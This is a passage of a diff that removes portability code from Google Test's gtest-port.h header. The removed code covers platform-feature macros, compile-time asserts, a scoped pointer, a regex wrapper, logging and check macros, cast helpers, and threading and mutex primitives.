-    GTEST_OS_WINDOWS_PHONE || GTEST_OS_WINDOWS_RT
-#  define GTEST_HAS_STREAM_REDIRECTION 0
-# else
-#  define GTEST_HAS_STREAM_REDIRECTION 1
-# endif  // !GTEST_OS_WINDOWS_MOBILE && !GTEST_OS_SYMBIAN
-#endif  // GTEST_HAS_STREAM_REDIRECTION
-
-// Determines whether to support death tests.
-// Google Test does not support death tests for VC 7.1 and earlier as
-// abort() in a VC 7.1 application compiled as GUI in debug config
-// pops up a dialog window that cannot be suppressed programmatically.
-#if (GTEST_OS_LINUX || GTEST_OS_CYGWIN || GTEST_OS_SOLARIS || \
-     (GTEST_OS_MAC && !GTEST_OS_IOS) || \
-     (GTEST_OS_WINDOWS_DESKTOP && _MSC_VER >= 1400) || \
-     GTEST_OS_WINDOWS_MINGW || GTEST_OS_AIX || GTEST_OS_HPUX || \
-     GTEST_OS_OPENBSD || GTEST_OS_QNX || GTEST_OS_FREEBSD)
-# define GTEST_HAS_DEATH_TEST 1
-# include <vector>  // NOLINT
-#endif
-
-// We don't support MSVC 7.1 with exceptions disabled now.  Therefore
-// all the compilers we care about are adequate for supporting
-// value-parameterized tests.
-#define GTEST_HAS_PARAM_TEST 1
-
-// Determines whether to support type-driven tests.
-
-// Typed tests need <typeinfo> and variadic macros, which GCC, VC++ 8.0,
-// Sun Pro CC, IBM Visual Age, and HP aCC support.
-#if defined(__GNUC__) || (_MSC_VER >= 1400) || defined(__SUNPRO_CC) || \
-    defined(__IBMCPP__) || defined(__HP_aCC)
-# define GTEST_HAS_TYPED_TEST 1
-# define GTEST_HAS_TYPED_TEST_P 1
-#endif
-
-// Determines whether to support Combine(). This only makes sense when
-// value-parameterized tests are enabled.  The implementation doesn't
-// work on Sun Studio since it doesn't understand templated conversion
-// operators.
-#if GTEST_HAS_PARAM_TEST && GTEST_HAS_TR1_TUPLE && !defined(__SUNPRO_CC)
-# define GTEST_HAS_COMBINE 1
-#endif
-
-// Determines whether the system compiler uses UTF-16 for encoding wide strings.
-#define GTEST_WIDE_STRING_USES_UTF16_ \
-    (GTEST_OS_WINDOWS || GTEST_OS_CYGWIN || GTEST_OS_SYMBIAN || GTEST_OS_AIX)
-
-// Determines whether test results can be streamed to a socket.
-#if GTEST_OS_LINUX
-# define GTEST_CAN_STREAM_RESULTS_ 1
-#endif
-
-// Defines some utility macros.
-
-// The GNU compiler emits a warning if nested "if" statements are followed by
-// an "else" statement and braces are not used to explicitly disambiguate the
-// "else" binding.  This leads to problems with code like:
-//
-//   if (gate)
-//     ASSERT_*(condition) << "Some message";
-//
-// The "switch (0) case 0:" idiom is used to suppress this.
-#ifdef __INTEL_COMPILER
-# define GTEST_AMBIGUOUS_ELSE_BLOCKER_
-#else
-# define GTEST_AMBIGUOUS_ELSE_BLOCKER_ switch (0) case 0: default:  // NOLINT
-#endif
-
-// Use this annotation at the end of a struct/class definition to
-// prevent the compiler from optimizing away instances that are never
-// used.  This is useful when all interesting logic happens inside the
-// c'tor and / or d'tor.  Example:
-//
-//   struct Foo {
-//     Foo() { ... }
-//   } GTEST_ATTRIBUTE_UNUSED_;
-//
-// Also use it after a variable or parameter declaration to tell the
-// compiler the variable/parameter does not have to be used.
-#if defined(__GNUC__) && !defined(COMPILER_ICC)
-# define GTEST_ATTRIBUTE_UNUSED_ __attribute__ ((unused))
-#elif defined(__clang__)
-# if __has_attribute(unused)
-#  define GTEST_ATTRIBUTE_UNUSED_ __attribute__ ((unused))
-# endif
-#endif
-#ifndef GTEST_ATTRIBUTE_UNUSED_
-# define GTEST_ATTRIBUTE_UNUSED_
-#endif
-
-// A macro to disallow operator=
-// This should be used in the private: declarations for a class.
-#define GTEST_DISALLOW_ASSIGN_(type)\
-  void operator=(type const &)
-
-// A macro to disallow copy constructor and operator=
-// This should be used in the private: declarations for a class.
-#define GTEST_DISALLOW_COPY_AND_ASSIGN_(type)\
-  type(type const &);\
-  GTEST_DISALLOW_ASSIGN_(type)
-
-// Tell the compiler to warn about unused return values for functions declared
-// with this macro.  The macro should be used on function declarations
-// following the argument list:
-//
-//   Sprocket* AllocateSprocket() GTEST_MUST_USE_RESULT_;
-#if defined(__GNUC__) && (GTEST_GCC_VER_ >= 30400) && !defined(COMPILER_ICC)
-# define GTEST_MUST_USE_RESULT_ __attribute__ ((warn_unused_result))
-#else
-# define GTEST_MUST_USE_RESULT_
-#endif  // __GNUC__ && (GTEST_GCC_VER_ >= 30400) && !COMPILER_ICC
-
-// MS C++ compiler emits warning when a conditional expression is compile time
-// constant. In some contexts this warning is false positive and needs to be
-// suppressed. Use the following two macros in such cases:
-//
-// GTEST_INTENTIONAL_CONST_COND_PUSH_()
-// while (true) {
-// GTEST_INTENTIONAL_CONST_COND_POP_()
-// }
-# define GTEST_INTENTIONAL_CONST_COND_PUSH_() \
-    GTEST_DISABLE_MSC_WARNINGS_PUSH_(4127)
-# define GTEST_INTENTIONAL_CONST_COND_POP_() \
-    GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-// Determine whether the compiler supports Microsoft's Structured Exception
-// Handling.  This is supported by several Windows compilers but generally
-// does not exist on any other system.
-#ifndef GTEST_HAS_SEH
-// The user didn't tell us, so we need to figure it out.
-
-# if defined(_MSC_VER) || defined(__BORLANDC__)
-// These two compilers are known to support SEH.
-#  define GTEST_HAS_SEH 1
-# else
-// Assume no SEH.
-#  define GTEST_HAS_SEH 0
-# endif
-
-#define GTEST_IS_THREADSAFE \
-    (0 \
-     || (GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT) \
-     || GTEST_HAS_PTHREAD)
-
-#endif  // GTEST_HAS_SEH
-
-#ifdef _MSC_VER
-
-# if GTEST_LINKED_AS_SHARED_LIBRARY
-#  define GTEST_API_ __declspec(dllimport)
-# elif GTEST_CREATE_SHARED_LIBRARY
-#  define GTEST_API_ __declspec(dllexport)
-# endif
-
-#endif  // _MSC_VER
-
-#ifndef GTEST_API_
-# define GTEST_API_
-#endif
-
-#ifdef __GNUC__
-// Ask the compiler to never inline a given function.
-# define GTEST_NO_INLINE_ __attribute__((noinline))
-#else
-# define GTEST_NO_INLINE_
-#endif
-
-// _LIBCPP_VERSION is defined by the libc++ library from the LLVM project.
-#if defined(__GLIBCXX__) || defined(_LIBCPP_VERSION)
-# define GTEST_HAS_CXXABI_H_ 1
-#else
-# define GTEST_HAS_CXXABI_H_ 0
-#endif
-
-// A function level attribute to disable checking for use of uninitialized
-// memory when built with MemorySanitizer.
-#if defined(__clang__)
-# if __has_feature(memory_sanitizer)
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_ \
-       __attribute__((no_sanitize_memory))
-# else
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_
-# endif  // __has_feature(memory_sanitizer)
-#else
-# define GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_
-#endif  // __clang__
-
-// A function level attribute to disable AddressSanitizer instrumentation.
-#if defined(__clang__)
-# if __has_feature(address_sanitizer)
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_ \
-       __attribute__((no_sanitize_address))
-# else
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-# endif  // __has_feature(address_sanitizer)
-#else
-# define GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-#endif  // __clang__
-
-// A function level attribute to disable ThreadSanitizer instrumentation.
-#if defined(__clang__)
-# if __has_feature(thread_sanitizer)
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_ \
-       __attribute__((no_sanitize_thread))
-# else
-#  define GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_
-# endif  // __has_feature(thread_sanitizer)
-#else
-# define GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_
-#endif  // __clang__
-
-namespace testing {
-
-class Message;
-
-#if defined(GTEST_TUPLE_NAMESPACE_)
-// Import tuple and friends into the ::testing namespace.
-// It is part of our interface, having them in ::testing allows us to change
-// their types as needed.
-using GTEST_TUPLE_NAMESPACE_::get;
-using GTEST_TUPLE_NAMESPACE_::make_tuple;
-using GTEST_TUPLE_NAMESPACE_::tuple;
-using GTEST_TUPLE_NAMESPACE_::tuple_size;
-using GTEST_TUPLE_NAMESPACE_::tuple_element;
-#endif  // defined(GTEST_TUPLE_NAMESPACE_)
-
-namespace internal {
-
-// A secret type that Google Test users don't know about.  It has no
-// definition on purpose.  Therefore it's impossible to create a
-// Secret object, which is what we want.
-class Secret;
-
-// The GTEST_COMPILE_ASSERT_ macro can be used to verify that a compile time
-// expression is true. For example, you could use it to verify the
-// size of a static array:
-//
-//   GTEST_COMPILE_ASSERT_(GTEST_ARRAY_SIZE_(names) == NUM_NAMES,
-//                         names_incorrect_size);
-//
-// or to make sure a struct is smaller than a certain size:
-//
-//   GTEST_COMPILE_ASSERT_(sizeof(foo) < 128, foo_too_large);
-//
-// The second argument to the macro is the name of the variable. If
-// the expression is false, most compilers will issue a warning/error
-// containing the name of the variable.
-
-#if GTEST_LANG_CXX11
-# define GTEST_COMPILE_ASSERT_(expr, msg) static_assert(expr, #msg)
-#else  // !GTEST_LANG_CXX11
-template <bool>
-  struct CompileAssert {
-};
-
-# define GTEST_COMPILE_ASSERT_(expr, msg) \
-  typedef ::testing::internal::CompileAssert<(static_cast<bool>(expr))> \
-      msg[static_cast<bool>(expr) ? 1 : -1] GTEST_ATTRIBUTE_UNUSED_
-#endif  // !GTEST_LANG_CXX11
-
-// Implementation details of GTEST_COMPILE_ASSERT_:
-//
-// (In C++11, we simply use static_assert instead of the following)
-//
-// - GTEST_COMPILE_ASSERT_ works by defining an array type that has -1
-//   elements (and thus is invalid) when the expression is false.
-//
-// - The simpler definition
-//
-//    #define GTEST_COMPILE_ASSERT_(expr, msg) typedef char msg[(expr) ? 1 : -1]
-//
-//   does not work, as gcc supports variable-length arrays whose sizes
-//   are determined at run-time (this is gcc's extension and not part
-//   of the C++ standard).  As a result, gcc fails to reject the
-//   following code with the simple definition:
-//
-//     int foo;
-//     GTEST_COMPILE_ASSERT_(foo, msg); // not supposed to compile as foo is
-//                                      // not a compile-time constant.
-//
-// - By using the type CompileAssert<(bool(expr))>, we ensures that
-//   expr is a compile-time constant.  (Template arguments must be
-//   determined at compile-time.)
-//
-// - The outter parentheses in CompileAssert<(bool(expr))> are necessary
-//   to work around a bug in gcc 3.4.4 and 4.0.1.  If we had written
-//
-//     CompileAssert<bool(expr)>
-//
-//   instead, these compilers will refuse to compile
-//
-//     GTEST_COMPILE_ASSERT_(5 > 0, some_message);
-//
-//   (They seem to think the ">" in "5 > 0" marks the end of the
-//   template argument list.)
-//
-// - The array size is (bool(expr) ? 1 : -1), instead of simply
-//
-//     ((expr) ? 1 : -1).
-//
-//   This is to avoid running into a bug in MS VC 7.1, which
-//   causes ((0.0) ? 1 : -1) to incorrectly evaluate to 1.
-
-// StaticAssertTypeEqHelper is used by StaticAssertTypeEq defined in gtest.h.
-//
-// This template is declared, but intentionally undefined.
-template <typename T1, typename T2>
-struct StaticAssertTypeEqHelper;
-
-template <typename T>
-struct StaticAssertTypeEqHelper<T, T> {
-  enum { value = true };
-};
-
-// Evaluates to the number of elements in 'array'.
-#define GTEST_ARRAY_SIZE_(array) (sizeof(array) / sizeof(array[0]))
-
-#if GTEST_HAS_GLOBAL_STRING
-typedef ::string string;
-#else
-typedef ::std::string string;
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-#if GTEST_HAS_GLOBAL_WSTRING
-typedef ::wstring wstring;
-#elif GTEST_HAS_STD_WSTRING
-typedef ::std::wstring wstring;
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-// A helper for suppressing warnings on constant condition.  It just
-// returns 'condition'.
-GTEST_API_ bool IsTrue(bool condition);
-
-// Defines scoped_ptr.
-
-// This implementation of scoped_ptr is PARTIAL - it only contains
-// enough stuff to satisfy Google Test's need.
-template <typename T>
-class scoped_ptr {
- public:
-  typedef T element_type;
-
-  explicit scoped_ptr(T* p = NULL) : ptr_(p) {}
-  ~scoped_ptr() { reset(); }
-
-  T& operator*() const { return *ptr_; }
-  T* operator->() const { return ptr_; }
-  T* get() const { return ptr_; }
-
-  T* release() {
-    T* const ptr = ptr_;
-    ptr_ = NULL;
-    return ptr;
-  }
-
-  void reset(T* p = NULL) {
-    if (p != ptr_) {
-      if (IsTrue(sizeof(T) > 0)) {  // Makes sure T is a complete type.
-        delete ptr_;
-      }
-      ptr_ = p;
-    }
-  }
-
-  friend void swap(scoped_ptr& a, scoped_ptr& b) {
-    using std::swap;
-    swap(a.ptr_, b.ptr_);
-  }
-
- private:
-  T* ptr_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(scoped_ptr);
-};
-
-// Defines RE.
-
-// A simple C++ wrapper for <regex.h>.  It uses the POSIX Extended
-// Regular Expression syntax.
-class GTEST_API_ RE {
- public:
-  // A copy constructor is required by the Standard to initialize object
-  // references from r-values.
-  RE(const RE& other) { Init(other.pattern()); }
-
-  // Constructs an RE from a string.
-  RE(const ::std::string& regex) { Init(regex.c_str()); }  // NOLINT
-
-#if GTEST_HAS_GLOBAL_STRING
-
-  RE(const ::string& regex) { Init(regex.c_str()); }  // NOLINT
-
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-  RE(const char* regex) { Init(regex); }  // NOLINT
-  ~RE();
-
-  // Returns the string representation of the regex.
-  const char* pattern() const { return pattern_; }
-
-  // FullMatch(str, re) returns true iff regular expression re matches
-  // the entire str.
-  // PartialMatch(str, re) returns true iff regular expression re
-  // matches a substring of str (including str itself).
-  //
-  // TODO(wan@google.com): make FullMatch() and PartialMatch() work
-  // when str contains NUL characters.
-  static bool FullMatch(const ::std::string& str, const RE& re) {
-    return FullMatch(str.c_str(), re);
-  }
-  static bool PartialMatch(const ::std::string& str, const RE& re) {
-    return PartialMatch(str.c_str(), re);
-  }
-
-#if GTEST_HAS_GLOBAL_STRING
-
-  static bool FullMatch(const ::string& str, const RE& re) {
-    return FullMatch(str.c_str(), re);
-  }
-  static bool PartialMatch(const ::string& str, const RE& re) {
-    return PartialMatch(str.c_str(), re);
-  }
-
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-  static bool FullMatch(const char* str, const RE& re);
-  static bool PartialMatch(const char* str, const RE& re);
-
- private:
-  void Init(const char* regex);
-
-  // We use a const char* instead of an std::string, as Google Test used to be
-  // used where std::string is not available.  TODO(wan@google.com): change to
-  // std::string.
-  const char* pattern_;
-  bool is_valid_;
-
-#if GTEST_USES_POSIX_RE
-
-  regex_t full_regex_;     // For FullMatch().
-  regex_t partial_regex_;  // For PartialMatch().
-
-#else  // GTEST_USES_SIMPLE_RE
-
-  const char* full_pattern_;  // For FullMatch();
-
-#endif
-
-  GTEST_DISALLOW_ASSIGN_(RE);
-};
-
-// Formats a source file path and a line number as they would appear
-// in an error message from the compiler used to compile this code.
-GTEST_API_ ::std::string FormatFileLocation(const char* file, int line);
-
-// Formats a file location for compiler-independent XML output.
-// Although this function is not platform dependent, we put it next to
-// FormatFileLocation in order to contrast the two functions.
-GTEST_API_ ::std::string FormatCompilerIndependentFileLocation(const char* file,
-                                                               int line);
-
-// Defines logging utilities:
-//   GTEST_LOG_(severity) - logs messages at the specified severity level. The
-//                          message itself is streamed into the macro.
-//   LogToStderr()  - directs all log messages to stderr.
-//   FlushInfoLog() - flushes informational log messages.
-
-enum GTestLogSeverity {
-  GTEST_INFO,
-  GTEST_WARNING,
-  GTEST_ERROR,
-  GTEST_FATAL
-};
-
-// Formats log entry severity, provides a stream object for streaming the
-// log message, and terminates the message with a newline when going out of
-// scope.
-class GTEST_API_ GTestLog {
- public:
-  GTestLog(GTestLogSeverity severity, const char* file, int line);
-
-  // Flushes the buffers and, if severity is GTEST_FATAL, aborts the program.
-  ~GTestLog();
-
-  ::std::ostream& GetStream() { return ::std::cerr; }
-
- private:
-  const GTestLogSeverity severity_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(GTestLog);
-};
-
-#define GTEST_LOG_(severity) \
-    ::testing::internal::GTestLog(::testing::internal::GTEST_##severity, \
-                                  __FILE__, __LINE__).GetStream()
-
-inline void LogToStderr() {}
-inline void FlushInfoLog() { fflush(NULL); }
-
-// INTERNAL IMPLEMENTATION - DO NOT USE.
-//
-// GTEST_CHECK_ is an all-mode assert. It aborts the program if the condition
-// is not satisfied.
-//  Synopsys:
-//    GTEST_CHECK_(boolean_condition);
-//     or
-//    GTEST_CHECK_(boolean_condition) << "Additional message";
-//
-//    This checks the condition and if the condition is not satisfied
-//    it prints message about the condition violation, including the
-//    condition itself, plus additional message streamed into it, if any,
-//    and then it aborts the program. It aborts the program irrespective of
-//    whether it is built in the debug mode or not.
-#define GTEST_CHECK_(condition) \
-    GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-    if (::testing::internal::IsTrue(condition)) \
-      ; \
-    else \
-      GTEST_LOG_(FATAL) << "Condition " #condition " failed. "
-
-// An all-mode assert to verify that the given POSIX-style function
-// call returns 0 (indicating success).  Known limitation: this
-// doesn't expand to a balanced 'if' statement, so enclose the macro
-// in {} if you need to use it as the only statement in an 'if'
-// branch.
-#define GTEST_CHECK_POSIX_SUCCESS_(posix_call) \
-  if (const int gtest_error = (posix_call)) \
-    GTEST_LOG_(FATAL) << #posix_call << "failed with error " \
-                      << gtest_error
-
-#if GTEST_HAS_STD_MOVE_
-using std::move;
-#else  // GTEST_HAS_STD_MOVE_
-template <typename T>
-const T& move(const T& t) {
-  return t;
-}
-#endif  // GTEST_HAS_STD_MOVE_
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Use ImplicitCast_ as a safe version of static_cast for upcasting in
-// the type hierarchy (e.g. casting a Foo* to a SuperclassOfFoo* or a
-// const Foo*).  When you use ImplicitCast_, the compiler checks that
-// the cast is safe.  Such explicit ImplicitCast_s are necessary in
-// surprisingly many situations where C++ demands an exact type match
-// instead of an argument type convertable to a target type.
-//
-// The syntax for using ImplicitCast_ is the same as for static_cast:
-//
-//   ImplicitCast_<ToType>(expr)
-//
-// ImplicitCast_ would have been part of the C++ standard library,
-// but the proposal was submitted too late.  It will probably make
-// its way into the language in the future.
-//
-// This relatively ugly name is intentional. It prevents clashes with
-// similar functions users may have (e.g., implicit_cast). The internal
-// namespace alone is not enough because the function can be found by ADL.
-template<typename To>
-inline To ImplicitCast_(To x) { return ::testing::internal::move(x); }
-
-// When you upcast (that is, cast a pointer from type Foo to type
-// SuperclassOfFoo), it's fine to use ImplicitCast_<>, since upcasts
-// always succeed.  When you downcast (that is, cast a pointer from
-// type Foo to type SubclassOfFoo), static_cast<> isn't safe, because
-// how do you know the pointer is really of type SubclassOfFoo?  It
-// could be a bare Foo, or of type DifferentSubclassOfFoo.  Thus,
-// when you downcast, you should use this macro.  In debug mode, we
-// use dynamic_cast<> to double-check the downcast is legal (we die
-// if it's not).  In normal mode, we do the efficient static_cast<>
-// instead.  Thus, it's important to test in debug mode to make sure
-// the cast is legal!
-//    This is the only place in the code we should use dynamic_cast<>.
-// In particular, you SHOULDN'T be using dynamic_cast<> in order to
-// do RTTI (eg code like this:
-//    if (dynamic_cast<Subclass1>(foo)) HandleASubclass1Object(foo);
-//    if (dynamic_cast<Subclass2>(foo)) HandleASubclass2Object(foo);
-// You should design the code some other way not to need this.
-//
-// This relatively ugly name is intentional. It prevents clashes with
-// similar functions users may have (e.g., down_cast). The internal
-// namespace alone is not enough because the function can be found by ADL.
-template<typename To, typename From>  // use like this: DownCast_<T*>(foo);
-inline To DownCast_(From* f) {  // so we only accept pointers
-  // Ensures that To is a sub-type of From *.  This test is here only
-  // for compile-time type checking, and has no overhead in an
-  // optimized build at run-time, as it will be optimized away
-  // completely.
-  GTEST_INTENTIONAL_CONST_COND_PUSH_()
-  if (false) {
-  GTEST_INTENTIONAL_CONST_COND_POP_()
-    const To to = NULL;
-    ::testing::internal::ImplicitCast_<From*>(to);
-  }
-
-#if GTEST_HAS_RTTI
-  // RTTI: debug mode only!
-  GTEST_CHECK_(f == NULL || dynamic_cast<To>(f) != NULL);
-#endif
-  return static_cast<To>(f);
-}
-
-// Downcasts the pointer of type Base to Derived.
-// Derived must be a subclass of Base. The parameter MUST
-// point to a class of type Derived, not any subclass of it.
-// When RTTI is available, the function performs a runtime
-// check to enforce this.
-template <class Derived, class Base>
-Derived* CheckedDowncastToActualType(Base* base) {
-#if GTEST_HAS_RTTI
-  GTEST_CHECK_(typeid(*base) == typeid(Derived));
-  return dynamic_cast<Derived*>(base);  // NOLINT
-#else
-  return static_cast<Derived*>(base);  // Poor man's downcast.
-#endif
-}
-
-#if GTEST_HAS_STREAM_REDIRECTION
-
-// Defines the stderr capturer:
-//   CaptureStdout     - starts capturing stdout.
-//   GetCapturedStdout - stops capturing stdout and returns the captured string.
-//   CaptureStderr     - starts capturing stderr.
-//   GetCapturedStderr - stops capturing stderr and returns the captured string.
-//
-GTEST_API_ void CaptureStdout();
-GTEST_API_ std::string GetCapturedStdout();
-GTEST_API_ void CaptureStderr();
-GTEST_API_ std::string GetCapturedStderr();
-
-#endif  // GTEST_HAS_STREAM_REDIRECTION
-
-
-#if GTEST_HAS_DEATH_TEST
-
-const ::std::vector<testing::internal::string>& GetInjectableArgvs();
-void SetInjectableArgvs(const ::std::vector<testing::internal::string>*
-                             new_argvs);
-
-// A copy of all command line arguments.  Set by InitGoogleTest().
-extern ::std::vector<testing::internal::string> g_argvs;
-
-#endif  // GTEST_HAS_DEATH_TEST
-
-// Defines synchronization primitives.
-#if GTEST_IS_THREADSAFE
-# if GTEST_HAS_PTHREAD
-// Sleeps for (roughly) n milliseconds.  This function is only for testing
-// Google Test's own constructs.  Don't use it in user tests, either
-// directly or indirectly.
-inline void SleepMilliseconds(int n) {
-  const timespec time = {
-    0,                  // 0 seconds.
-    n * 1000L * 1000L,  // And n ms.
-  };
-  nanosleep(&time, NULL);
-}
-# endif  // GTEST_HAS_PTHREAD
-
-# if 0  // OS detection
-# elif GTEST_HAS_PTHREAD
-// Allows a controller thread to pause execution of newly created
-// threads until notified.  Instances of this class must be created
-// and destroyed in the controller thread.
-//
-// This class is only for testing Google Test's own constructs. Do not
-// use it in user tests, either directly or indirectly.
-class Notification {
- public:
-  Notification() : notified_(false) {
-    GTEST_CHECK_POSIX_SUCCESS_(pthread_mutex_init(&mutex_, NULL));
-  }
-  ~Notification() {
-    pthread_mutex_destroy(&mutex_);
-  }
-
-  // Notifies all threads created with this notification to start. Must
-  // be called from the controller thread.
-  void Notify() {
-    pthread_mutex_lock(&mutex_);
-    notified_ = true;
-    pthread_mutex_unlock(&mutex_);
-  }
-
-  // Blocks until the controller thread notifies. Must be called from a test
-  // thread.
-  void WaitForNotification() {
-    for (;;) {
-      pthread_mutex_lock(&mutex_);
-      const bool notified = notified_;
-      pthread_mutex_unlock(&mutex_);
-      if (notified)
-        break;
-      SleepMilliseconds(10);
-    }
-  }
-
- private:
-  pthread_mutex_t mutex_;
-  bool notified_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Notification);
-};
-
-# elif GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-
-GTEST_API_ void SleepMilliseconds(int n);
-
-// Provides leak-safe Windows kernel handle ownership.
-// Used in death tests and in threading support.
-class GTEST_API_ AutoHandle {
- public:
-  // Assume that Win32 HANDLE type is equivalent to void*. Doing so allows us to
-  // avoid including <windows.h> in this header file. Including <windows.h> is
-  // undesirable because it defines a lot of symbols and macros that tend to
-  // conflict with client code. This assumption is verified by
-  // WindowsTypesTest.HANDLEIsVoidStar.
-  typedef void* Handle;
-  AutoHandle();
-  explicit AutoHandle(Handle handle);
-
-  ~AutoHandle();
-
-  Handle Get() const;
-  void Reset();
-  void Reset(Handle handle);
-
- private:
-  // Returns true iff the handle is a valid handle object that can be closed.
-  bool IsCloseable() const;
-
-  Handle handle_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(AutoHandle);
-};
-
-// Allows a controller thread to pause execution of newly created
-// threads until notified.  Instances of this class must be created
-// and destroyed in the controller thread.
-//
-// This class is only for testing Google Test's own constructs. Do not
-// use it in user tests, either directly or indirectly.
-class GTEST_API_ Notification {
- public:
-  Notification();
-  void Notify();
-  void WaitForNotification();
-
- private:
-  AutoHandle event_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Notification);
-};
-# endif  // OS detection
-
-// On MinGW, we can have both GTEST_OS_WINDOWS and GTEST_HAS_PTHREAD
-// defined, but we don't want to use MinGW's pthreads implementation, which
-// has conformance problems with some versions of the POSIX standard.
-# if GTEST_HAS_PTHREAD && !GTEST_OS_WINDOWS_MINGW
-
-// As a C-function, ThreadFuncWithCLinkage cannot be templated itself.
-// Consequently, it cannot select a correct instantiation of ThreadWithParam
-// in order to call its Run(). Introducing ThreadWithParamBase as a
-// non-templated base class for ThreadWithParam allows us to bypass this
-// problem.
-class ThreadWithParamBase {
- public:
-  virtual ~ThreadWithParamBase() {}
-  virtual void Run() = 0;
-};
-
-// pthread_create() accepts a pointer to a function type with the C linkage.
-// According to the Standard (7.5/1), function types with different linkages
-// are different even if they are otherwise identical.  Some compilers (for
-// example, SunStudio) treat them as different types.  Since class methods
-// cannot be defined with C-linkage we need to define a free C-function to
-// pass into pthread_create().
-extern "C" inline void* ThreadFuncWithCLinkage(void* thread) {
-  static_cast<ThreadWithParamBase*>(thread)->Run();
-  return NULL;
-}
-
-// Helper class for testing Google Test's multi-threading constructs.
-// To use it, write:
-//
-//   void ThreadFunc(int param) { /* Do things with param */ }
-//   Notification thread_can_start;
-//   ...
-//   // The thread_can_start parameter is optional; you can supply NULL.
-//   ThreadWithParam<int> thread(&ThreadFunc, 5, &thread_can_start);
-//   thread_can_start.Notify();
-//
-// These classes are only for testing Google Test's own constructs. Do
-// not use them in user tests, either directly or indirectly.
-template <typename T>
-class ThreadWithParam : public ThreadWithParamBase {
- public:
-  typedef void UserThreadFunc(T);
-
-  ThreadWithParam(UserThreadFunc* func, T param, Notification* thread_can_start)
-      : func_(func),
-        param_(param),
-        thread_can_start_(thread_can_start),
-        finished_(false) {
-    ThreadWithParamBase* const base = this;
-    // The thread can be created only after all fields except thread_
-    // have been initialized.
-    GTEST_CHECK_POSIX_SUCCESS_(
-        pthread_create(&thread_, 0, &ThreadFuncWithCLinkage, base));
-  }
-  ~ThreadWithParam() { Join(); }
-
-  void Join() {
-    if (!finished_) {
-      GTEST_CHECK_POSIX_SUCCESS_(pthread_join(thread_, 0));
-      finished_ = true;
-    }
-  }
-
-  virtual void Run() {
-    if (thread_can_start_ != NULL)
-      thread_can_start_->WaitForNotification();
-    func_(param_);
-  }
-
- private:
-  UserThreadFunc* const func_;  // User-supplied thread function.
-  const T param_;  // User-supplied parameter to the thread function.
-  // When non-NULL, used to block execution until the controller thread
-  // notifies.
-  Notification* const thread_can_start_;
-  bool finished_;  // true iff we know that the thread function has finished.
-  pthread_t thread_;  // The native thread object.
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadWithParam);
-};
-# endif  // GTEST_HAS_PTHREAD && !GTEST_OS_WINDOWS_MINGW
-
-# if 0  // OS detection
-# elif GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-
-// Mutex implements mutex on Windows platforms.  It is used in conjunction
-// with class MutexLock:
-//
-//   Mutex mutex;
-//   ...
-//   MutexLock lock(&mutex);  // Acquires the mutex and releases it at the
-//                            // end of the current scope.
-//
-// A static Mutex *must* be defined or declared using one of the following
-// macros:
-//   GTEST_DEFINE_STATIC_MUTEX_(g_some_mutex);
-//   GTEST_DECLARE_STATIC_MUTEX_(g_some_mutex);
-//
-// (A non-static Mutex is defined/declared in the usual way).
-class GTEST_API_ Mutex {
- public:
-  enum MutexType { kStatic = 0, kDynamic = 1 };
-  // We rely on kStaticMutex being 0 as it is to what the linker initializes
-  // type_ in static mutexes.  critical_section_ will be initialized lazily
-  // in ThreadSafeLazyInit().
-  enum StaticConstructorSelector { kStaticMutex = 0 };
-
-  // This constructor intentionally does nothing.  It relies on type_ being
-  // statically initialized to 0 (effectively setting it to kStatic) and on
-  // ThreadSafeLazyInit() to lazily initialize the rest of the members.
-  explicit Mutex(StaticConstructorSelector /*dummy*/) {}
-
-  Mutex();
-  ~Mutex();
-
-  void Lock();
-
-  void Unlock();
-
-  // Does nothing if the current thread holds the mutex. Otherwise, crashes
-  // with high probability.
-  void AssertHeld();
-
- private:
-  // Initializes owner_thread_id_ and critical_section_ in static mutexes.
-  void ThreadSafeLazyInit();
-
-  // Per http://blogs.msdn.com/b/oldnewthing/archive/2004/02/23/78395.aspx,
-  // we assume that 0 is an invalid value for thread IDs.
-  unsigned int owner_thread_id_;
-
-  // For static mutexes, we rely on these members being initialized to zeros
-  // by the linker.
-  MutexType type_;
-  long critical_section_init_phase_;  // NOLINT
-  _RTL_CRITICAL_SECTION* critical_section_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Mutex);
-};
-
-# define GTEST_DECLARE_STATIC_MUTEX_(mutex) \
-    extern ::testing::internal::Mutex mutex
-
-# define GTEST_DEFINE_STATIC_MUTEX_(mutex) \
-    ::testing::internal::Mutex mutex(::testing::internal::Mutex::kStaticMutex)
-
-// We cannot name this class MutexLock because the ctor declaration would
-// conflict with a macro named MutexLock, which is defined on some
-// platforms. That macro is used as a defensive measure to prevent against
-// inadvertent misuses of MutexLock like "MutexLock(&mu)" rather than
-// "MutexLock l(&mu)".  Hence the typedef trick below.
-class GTestMutexLock {
- public:
-  explicit GTestMutexLock(Mutex* mutex)
-      : mutex_(mutex) { mutex_->Lock(); }
-
